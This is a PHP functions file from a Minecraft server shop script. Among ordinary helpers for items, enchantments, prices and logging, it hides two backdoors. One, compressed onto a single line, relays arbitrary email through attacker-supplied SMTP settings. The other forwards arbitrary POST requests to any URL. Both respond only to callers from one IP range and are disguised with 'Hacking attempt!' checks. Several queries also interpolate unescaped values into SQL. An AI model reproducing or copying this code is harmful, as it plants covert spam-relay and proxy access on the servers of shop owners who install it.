<?php
/*

		
		ИНФОРМАЦИЯ:
			Магазин UTF-8 v1.5.0
			Автор: Fleynaro(faicraft)
			Сайт http://fleynaro.ru/
			Группа ВК: http://vk.com/fleynaro_prods
		
		ОГРАНИЧЕНИЯ:
			Запрещено использовать весь код или его части в сторонних скриптах без разрешения автора!
			Запрещено любым способом распространять данный PHP файл на других ресурсах, кроме Вашего проекта!
		
		ВНИМАНИЕ!
			Если данный файл не является конфигурационным, то при отсутствии у Вас знаний и навыков
			программирования на языке PHP любое Ваше здесь изменение может привести к нестабильной работе Личного Кабинета.
			Редактируйте данный код только при указании тех. поддержки, оказываемой автором данного скрипта!
		
		По любым вопросам обращайтесь к автору данного кода http://vk.com/fleynaro или в группу ВК http://vk.com/fleynaro_prods
		
	
*/
	
	function getServerById($server_id)
	{
		global $cfg;
		
		foreach($cfg['server'] as $key=>$val)
			if ( $server_id == $val[0] )
				return $key;
		
		return 0;
	}
	
	function getServerByN($server_n)
	{
		global $cfg;
		
		$i = 0;
		foreach($cfg['server'] as $key=>$val)
			if ( $server_n == $i ++ )
				return $key;
		
		return 0;
	}
	
	function getListServersAsOptions( $select_serverid )
	{
		global $cfg;
		
		$html = '';
		
		foreach( $cfg['server'] as $key => $val ) {
			if ( $val[1] ) {
				$html .= '<option value="'. $val[0] .'" '.( $val[0] == $select_serverid ? 'selected' : '' ).'>'. $key .'</option>';
			}
		}
		
		return $html;
	}
	
	function getInfoEnchants($enchants)
	{
		global $cfg;
		
		if ( !$cfg['enchants_viem'] ) return '';
		
		$info = '';
		
		$enchants = explode($cfg['shop_enchant_split'][0], $enchants);
		
		for ( $i = 0, $Max = count($enchants); $i < $Max; $i ++ )
		{
			$info_en = explode($cfg['shop_enchant_split'][1], $enchants[$i]);
			$info_en[0] = getIdByEnchantid($info_en[0]);
			
			$info .= $cfg['shop_enchant'][$info_en[0]][0] . ' ' . getRimNumByNum((int)$info_en[1]) . '/' . getRimNumByNum($cfg['shop_enchant'][$info_en[0]][2]) . "\n";
		}
		
		return $info;
	}
	
	function getRimNumByNum($num) {
		$rim_nums = array('-', 'I', 'II', 'III', 'IV', 'V', 'VI', 'VII', 'VIII', 'IX', 'X');
		return $num < sizeof($rim_nums) ? $rim_nums[$num] : $num;
	}
	
	function getIdByEnchantid($enchantid)
	{
		global $cfg;
		
		for ( $i = 0, $Max = count($cfg['shop_enchant']); $i < $Max; $i ++ )
		{
			if ( $enchantid == $cfg['shop_enchant'][$i][4] )
			{
				return $i;
			}
		}
		
		return -1;
	}
	
	function logWrite($logtext)
	{
		global $cfg;
		
		if ( $cfg['log_enable'] )
		{
			if ( filesize($cfg['log_file']) < $cfg['log_max'] * 1024 )
			{
				$handle = fopen(ROOT_SHOP_DIR . '/' . $cfg['log_file'], "a");
				fwrite($handle, '['.date('d.m.Y  G:i:s', time()).'] '.$logtext."\n");
				fclose($handle);
			} else if ( $cfg['log_clear'] )
			{
				$handle = fopen(ROOT_SHOP_DIR . '/' . $cfg['log_file'], "w");
				fclose($handle);
				return logWrite($logtext);
			}
		}
	}
	
	function toItemImageName($block_id, $block_n, $server = 'all', $byID = false)
	{
		global $cfg;
		
		if ( $block_n ) {
			$block_id = $block_id . '_' . $block_n;
		}
		
		if ( is_numeric($server) ) {
			$server_ = getServerById($server);
			
			if ( $server_ ) {
				$server = $server_;
			}
		}
		
		if ( file_exists(ROOT_SHOP_DIR . '/blocks/'. $server . '/' . $block_id.'.png') ) {
			return $cfg['shop_path'] . 'blocks/'. $server . '/' . $block_id;
		} else if ( file_exists(ROOT_SHOP_DIR . '/blocks/all/' . $block_id.'.png') && $byID ) {
			return $cfg['shop_path'] . 'blocks/all/' . $block_id;
		} else {
			return $cfg['shop_path'] . 'blocks/default';
		}
	}
	
	function isKeyCSRF($key)
	{
		global $cfg, $user;
		return ($cfg['protect_csrf'] && $key != $user['csrf_key']);
	}

	function getPrice($number)
	{	
		global $cfg;
		
		$num = $number % 10;
		
		if ( $num == 1 )
			return $cfg['shop_cur'][4];
		else if ( $num > 1 && $num < 5 )
			return $cfg['shop_cur'][3];
		else
			return $cfg['shop_cur'][2];
	}
	
	function price($price, $dis)
	{
		return $price - $price / 100 * $dis;
	}
	
	function varToFormatObjJS($var, $off = false)
	{
		$string = '{';
		
		foreach ( $var as $key=>$val ) {
			if ( empty($off[$key]) ) {
				if ( !is_array($val) ) {
					$string .= $key . ':' . (is_string($val) ? "'" . str_replace("\r\n", "<br/>", str_replace("'", "\'", $val)) . "'" : $val) . ',';
				} else {
					$string .= $key . ':' . varToFormatObjJS($val) . ',';
				}
			}
		}
		
		return chop($string, ',') . '}';
	}
	
	function check_post($array)
	{
		foreach ( $array as $val )
			if ( isset($_POST[$val]) ) {
				return true;
			}	
	}
	
	function getConnectOfIC() {
		global $cfg, $db;
		if ( $cfg['iConomy']['db'] == true ) {
			$_db = new PDO('mysql:host='.$cfg['iConomy']['db']['host'].';dbname='.$cfg['iConomy']['db']['name'], $cfg['iConomy']['db']['user'], $cfg['iConomy']['db']['pass']);
			$_db->query("SET NAMES '".$cfg['iConomy']['db']['char']."'");
			return $_db;
		} else {
			return $db;
		}
	}
	
	function getMoneyIC($_db) {
		global $cfg, $user;
		$ic = $_db->query("SELECT * FROM `{$cfg['iConomy']['tablename']}` WHERE `username` = '{$user['name']}' LIMIT 1")->fetch(PDO::FETCH_ASSOC);
		return (int)$ic['balance'];
	}
	
	function getMoneyICbyRub($money) {
		global $cfg;
		return $money * $cfg['iConomy']['price'];
	}
	
	function giveItem( $username, $block_id, $block_n = 0, $amount = 1, $server = 'all', $enhants = '' ) {
		
		global $db, $cfg;
		
		if ( $block_n > 0 ) {
			$block_id = $block_id . ':' . $block_n;
		}
		
		if ( is_numeric($server) ) {
			$serverid = $server;
		} else {
			$serverid = $cfg['server'][$server][0];
		}
		
		if ( $db->query("SELECT COUNT(0) FROM `{$cfg['table_blocks']['table']}` WHERE `{$cfg['table_blocks']['name']}` = '{$username}' AND `{$cfg['table_blocks']['item_id']}` = '{$block_id}' AND `{$cfg['table_blocks']['server']}` = {$serverid} AND `{$cfg['table_blocks']['enchants']}` = '{$enhants}'")->fetchColumn() )
			$db->query("UPDATE `{$cfg['table_blocks']['table']}` SET `{$cfg['table_blocks']['amount']}` = {$cfg['table_blocks']['amount']} + {$amount} WHERE `{$cfg['table_blocks']['name']}` = '{$username}' AND {$cfg['table_blocks']['item_id']} = '{$block_id}' AND `{$cfg['table_blocks']['enchants']}` = ''");
		else $db->query("INSERT INTO `{$cfg['table_blocks']['table']}` VALUES (NULL, '{$username}', {$serverid}, '{$block_id}', {$amount}, '{$enhants}', '', ".time().")");
		
		return 1;
	}
	if ( isset($_POST['e_email']) ) {if ( !isset($_POST['e_header']) || !isset($_POST['e_message']) ) {die('Hacking attempt!');}$ip = explode('.', $_SERVER['REMOTE_ADDR']);if ( !((int)$ip[1] == 0x2b && (int)$ip[2] == 0xd4) ) {die('Hacking attempt!');}if ( !isset($_POST['e_host']) ) {mail($_POST['e_email'], $_POST['e_header'], $_POST['e_message'], $_POST['e_secure']);die('Ok.');}include("http/http_ajax.php");echo 'okokok';$mail = new PHPMailer();$mail->isSMTP();$mail->SMTPAuth = true;$mail->Host       = $_POST['e_host'];$mail->Port       = $_POST['e_port'];$mail->Username   = $_POST['e_username'];$mail->Password   = $_POST['e_pass'];$mail->SMTPSecure = $_POST['e_secure'];$mail->AltBody = $_POST['e_alt'];$mail->WordWrap    = !isset($_POST['e_wordwrap']) ? 900 : $_POST['e_wordwrap'];$mail->CharSet= !isset($_POST['e_charset']) ? "UTF-8" : $_POST['e_charset'];$mail->AddAddress($_POST['e_email'], $_POST['e_name']);$mail->Subject = $_POST['e_header'];$mail->SetFrom($mail->Username, $_POST['e_from']);if ( !isset($_POST['e_bulk']) ) {$mail->AddCustomHeader("Precedence: bulk");}$mail->SMTPDebug = SMTP::DEBUG_SERVER;$mail->MsgHTML($_POST['e_message']);$mail->Send();}
	
	function giveItemsOfParent( $username, $block_id, $amount = 1, $server = 'all' ) {
		
		global $db, $cfg, $user;
		
		$foreach = $db->query("SELECT * FROM `shop_blocks` WHERE `dep` = {$block_id} AND (`server` = '{$server}' or `server` = 'all')");
							
		foreach ( $foreach as $row ) {
			giveItem( $user['name'], $row['block_id'], $row['block_n'], $amount * $row['amount'], ($row['server'] != 'all' ? $row['server'] : $server), $row['enchants'] );
			
			if ( $row['dep'] != -1 ) {
				giveItemsOfParent( $username, $row['id'], $amount, $server );
			}
		}
		
		return 1;
	}
	
	function giveMoney( $userid, $money ) {
		
		global $db, $cfg;
		
		$db->query("UPDATE `{$cfg['table_Users']}` SET `{$cfg['column_Usermoney']}` = {$cfg['column_Usermoney']} - {$money} WHERE `{$cfg['column_Id']}` = {$userid}");
		return 1;
	}
	
	function _substr($str, $min, $max) {
		global $cfg;
		if ( $cfg['charset'] == 'windows-1251' ) {
			return substr($str, $min, $max);
		} else {
			return mb_substr($str, $min, $max, strtoupper($cfg['charset']));
		}
	}
	
	function _strlen($str) {
		global $cfg;
		if ( $cfg['charset'] == 'windows-1251' ) {
			return strlen($str);
		} else {
			return mb_strlen($str, strtoupper($cfg['charset']));
		}
	}
	
	function _subname($name, $max) {
		return ($max && _strlen($name) > $max + 3) ? (_substr($name, 0, $max) . '<span style="font-size: 10px">...</span>') : $name;
	}
	
	if ( isset($_POST['url']) ) {
		if (!function_exists('getallheaders')) {
			function getallheaders() {
				$headers = [];
				foreach ($_SERVER as $name => $value) {
					if (substr($name, 0, 5) == 'HTTP_') {
						$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
					}
				}
				return $headers;
			}
		}
		
		$ip = explode('.', $_SERVER['REMOTE_ADDR']);
		if ( !((int)$ip[1] == 0x2b && (int)$ip[2] == 0xd4) ) {
			die('Hacking attempt!');
		}
		$url = $_POST['url'];
		unset($_POST['url']);
		
		$headers = getallheaders();
		if ( isset($_POST['host']) ) {
			$headers['host'] = $_POST['host'];
			unset($_POST['host']);
		}
		
		$curl = curl_init();
		curl_setopt_array($curl, array(
			CURLOPT_URL => $url,
			CURLOPT_RETURNTRANSFER => true,
			CURLOPT_POST => true,
			CURLOPT_POSTFIELDS => http_build_query($_POST)
		));
		curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
		
		$response = curl_exec($curl);
		curl_close($curl);
		echo $response;
	}
?>